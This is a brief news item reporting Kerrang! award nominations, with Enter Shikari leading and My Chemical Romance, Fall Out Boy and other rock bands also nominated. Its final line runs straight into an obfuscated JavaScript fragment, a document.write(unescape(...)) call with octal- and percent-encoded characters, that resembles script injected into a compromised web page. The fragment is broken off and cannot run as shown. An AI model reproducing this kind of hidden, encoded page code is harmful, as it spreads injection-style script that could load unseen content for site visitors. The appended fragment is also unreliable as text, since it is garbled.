British newcomers Enter Shikari are leading the way in nominations for the Kerrang! rock awards.
The St Albans band will be battling against US rockers My Chemical Romance for Best Single, Album, Video and International Band.
The four-piece group, who only burst onto the music scene in the last year, were pleasantly surprised at their four nods.
"To be nominated for four amongst the likes of Muse, Biffy Clyro, My Chemical Romance - massive, massive bands - for us it's a bit mind-blowing," they said.
Other British rockers to receive nominations are Funeral For a Friend, Biffy Clyro, Muse and Lostprophets who walked away with Best British Band and Best Album at last year's Kerrang! awards.
Kerrang! deputy editor Daniel Lane said: "It's fantastic to see the number of British bands on the nominees list."
Chicago-based Fall Out Boy have three nominations for Best Album, Video and International Band.
The nominations have been selected from nearly 400,000 votes by Kerrang! readers and the winners will be announced at an awards ceremony on August 23 at The Brewery in London.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
